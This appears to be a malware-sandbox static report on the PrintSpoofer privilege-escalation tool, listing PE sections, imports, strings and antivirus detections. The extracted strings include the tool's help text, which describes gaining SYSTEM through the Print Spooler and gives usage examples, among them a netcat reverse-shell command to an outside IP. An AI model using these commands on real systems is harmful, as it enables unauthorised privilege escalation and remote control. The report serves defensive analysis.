Static | ZeroBOX

PE Compile Time

2020-09-11 02:43:17

PE Imphash

c8bf48e03c8c37268b47f1d2591aa6fd

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00001abd 0x00001c00 6.1342057333
.rdata 0x00003000 0x00002db6 0x00002e00 4.06496359537
.data 0x00006000 0x00000398 0x00000200 0.280401167659
.rsrc 0x00007000 0x000001e0 0x00000200 4.70150325825
.reloc 0x00008000 0x000002e8 0x00000400 5.41990206757

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00007060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x403038 ConnectNamedPipe
0x40303c GetComputerNameW
0x403040 CreateThread
0x403044 CloseHandle
0x403048 GetCurrentThread
0x40304c GetLastError
0x403050 CreateEventW
0x403054 GetSystemDirectoryW
0x403058 WaitForSingleObject
0x40305c CreateNamedPipeW
0x403060 GetCurrentProcess
0x403064 IsDebuggerPresent
0x403068 InitializeSListHead
0x403070 GetCurrentThreadId
0x403074 GetCurrentProcessId
0x403080 TerminateProcess
0x40308c GetModuleHandleW
Library ADVAPI32.dll:
0x403000 OpenThreadToken
0x403008 RevertToSelf
0x40300c SetTokenInformation
0x403018 OpenProcessToken
0x40302c DuplicateTokenEx
0x403030 GetTokenInformation
Library RPCRT4.dll:
0x403094 UuidCreate
0x403098 RpcBindingFree
0x40309c RpcStringFreeW
0x4030a4 UuidToStringW
0x4030ac NdrClientCall2
Library USERENV.dll:
Library VCRUNTIME140.dll:
0x4030c0 memset
0x4030c8 __current_exception
Library api-ms-win-crt-stdio-l1-1-0.dll:
0x403150 __p__commode
0x403154 _set_fmode
0x403158 __acrt_iob_func
0x403160 fflush
Library api-ms-win-crt-string-l1-1-0.dll:
0x403168 _wcsicmp
Library api-ms-win-crt-convert-l1-1-0.dll:
0x4030d4 wcstoul
Library api-ms-win-crt-heap-l1-1-0.dll:
0x4030dc malloc
0x4030e0 _set_new_mode
0x4030e4 free
Library api-ms-win-crt-runtime-l1-1-0.dll:
0x4030fc _c_exit
0x403104 __p___argc
0x403108 _initterm_e
0x40310c _set_app_type
0x403110 _cexit
0x403114 _seh_filter_exe
0x40311c _crt_atexit
0x403120 _controlfp_s
0x403124 terminate
0x40312c _initterm
0x403130 _exit
0x403138 __p___wargv
0x403144 exit
Library api-ms-win-crt-math-l1-1-0.dll:
0x4030f4 __setusermatherr
Library api-ms-win-crt-locale-l1-1-0.dll:
0x4030ec _configthreadlocale

Strings

ncacn_np
\pipe\spoolss
GetCurrentProcess
CreateNamedPipeW
WaitForSingleObject
GetSystemDirectoryW
CreateEventW
GetLastError
GetCurrentThread
CloseHandle
CreateThread
GetComputerNameW
ConnectNamedPipe
KERNEL32.dll
GetTokenInformation
OpenThreadToken
DuplicateTokenEx
ConvertStringSecurityDescriptorToSecurityDescriptorW
CreateProcessAsUserW
InitializeSecurityDescriptor
ImpersonateNamedPipeClient
OpenProcessToken
CreateProcessWithTokenW
LookupPrivilegeNameW
SetTokenInformation
RevertToSelf
AdjustTokenPrivileges
ADVAPI32.dll
NdrClientCall2
UuidToStringW
RpcBindingFromStringBindingW
RpcStringBindingComposeW
RpcStringFreeW
RpcBindingFree
UuidCreate
RPCRT4.dll
DestroyEnvironmentBlock
CreateEnvironmentBlock
USERENV.dll
_except_handler4_common
__current_exception
__current_exception_context
memset
VCRUNTIME140.dll
__acrt_iob_func
_wcsicmp
fflush
__stdio_common_vfwprintf
wcstoul
__stdio_common_vswprintf
malloc
_seh_filter_exe
_set_app_type
__setusermatherr
_configure_wide_argv
_initialize_wide_environment
_get_initial_wide_environment
_initterm
_initterm_e
_set_fmode
__p___argc
__p___wargv
_cexit
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
_initialize_onexit_table
_register_onexit_function
_crt_atexit
_controlfp_s
terminate
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-string-l1-1-0.dll
api-ms-win-crt-convert-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetModuleHandleW
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
[-] Invalid session id: %ws
[-] Missing value for option: -d
[-] Missing value for option: -c
[-] Invalid argument: %ls
[-] More than one interaction mode was specified.
[-] Please specify a command to execute
PrintSpoofer v%ws (by @itm4n)
Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
Arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h That's me :)
Examples:
- Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
- Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
- Get a SYSTEM reverse shell
PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"
SeImpersonatePrivilege
[-] A privilege is missing: '%ws'
[+] Found privilege: %ws
[-] Failed to generate a name for the pipe.
[-] Failed to create a named pipe.
[-] Failed to connect the named pipe.
[+] Named pipe listening...
[-] Failed to trigger the Spooler service.
[-] Operation failed or timed out.
OpenProcessToken() failed. Error: %d
GetTokenInformation() failed. Error: %d
LookupPrivilegeName() failed. Error: %d
AdjustTokenPrivileges() failed. Error: %d
\\.\pipe\%ws\pipe\spoolss
InitializeSecurityDescriptor() failed. Error: %d
D:(A;OICI;GA;;;WD)
ConvertStringSecurityDescriptorToSecurityDescriptor() failed. Error: %d
CreateNamedPipe() failed. Error: %d
CreateEvent() failed. Error: %d
ConnectNamedPipe() failed. Error: %d
CreateThread() failed. Error: %d
\\%ws/pipe/%ws
ImpersonateNamedPipeClient(). Error: %d
OpenThreadToken(). Error: %d
DuplicateTokenEx() failed. Error: %d
SetTokenInformation() failed. Error: %d
GetSystemDirectory() failed. Error: %d
CreateEnvironmentBlock() failed. Error: %d
WinSta0\Default
[!] CreateProcessAsUser() failed because of a missing privilege, retrying with CreateProcessWithTokenW().
CreateProcessWithTokenW() failed. Error: %d
[+] CreateProcessWithTokenW() OK
[!] CreateProcessWithTokenW() isn't compatible with option -i
CreateProcessAsUser() failed. Error: %d
[+] CreateProcessAsUser() OK
\pipe\spoolss
ncacn_np
12345678-1234-ABCD-EF00-0123456789AB
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.PrintSpoofer.3!c
tehtris Clean
ClamAV Win.Malware.Printspoofer-9835534-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.Dropper.mm
ALYac Generic.PrintSpoofer.1.36D0EC94
Cylance Unsafe
Zillya Tool.Agent.Win32.43329
Sangfor Hacktool.Win32.Printspoofer.Vjqs
K7AntiVirus Hacktool ( 00568d8b1 )
Alibaba Exploit:Win32/Printer.b02419b6
K7GW Hacktool ( 00568d8b1 )
Cybereason malicious.7b5002
huorong HackTool/EoP.a
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic Windows.Exploit.FakePipe
ESET-NOD32 a variant of Win32/HackTool.Agent.NFL
APEX Clean
Avast Win32:ExploitX-gen [Expl]
Cynet Malicious (score: 99)
Kaspersky HEUR:Exploit.Multi.Printer.gen
BitDefender Generic.PrintSpoofer.1.36D0EC94
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Generic.PrintSpoofer.1.36D0EC94
Tencent Malware.Win32.Gencirc.115db5f5
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/Hacktool.njyhi
DrWeb Tool.PrintSpoofer.3
VIPRE Generic.PrintSpoofer.1.36D0EC94
TrendMicro TROJ_GEN.R002C0GL523
McAfeeD ti!47C9EFF81424
Trapmine Clean
FireEye Generic.mg.2a74db17b50025d1
Emsisoft Generic.PrintSpoofer.1.36D0EC94 (B)
Ikarus Trojan.Win32.HackTool
GData Generic.PrintSpoofer.1.36D0EC94
Jiangmin Exploit.Printer.a
Webroot W32.Malware.Gen
Varist W32/ABTrojan.RRGN-8635
Avira TR/Hacktool.njyhi
Antiy-AVL HackTool/Win32.Agent
Kingsoft Clean
Gridinsoft Clean
Xcitium Malware@#2aytu59dcgnz
Arcabit Generic.PrintSpoofer.1.36D0EC94
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.Multi.Printer.gen
Microsoft Trojan:Win32/Skeeyah
Google Detected
AhnLab-V3 Exploit/Win.PrintSpoofer.R358767
Acronis Clean
McAfee GenericRXAA-AA!2A74DB17B500
MAX malware (ai score=81)
VBA32 Clean
Malwarebytes Generic.Trojan.HackTool.DDS
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0GL523
Rising HackTool.Agent!8.335 (TFE:5:dPySkdZtye)
Yandex Riskware.Agent!LoXxUTKSAHg
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.118857602.susgen
Fortinet W32/Agent.NFL!tr
BitDefenderTheta Clean
AVG Win32:ExploitX-gen [Expl]
DeepInstinct MALICIOUS
CrowdStrike win/grayware_confidence_100% (W)
alibabacloud HackTool:Win/Agent.BG
No IRMA results available.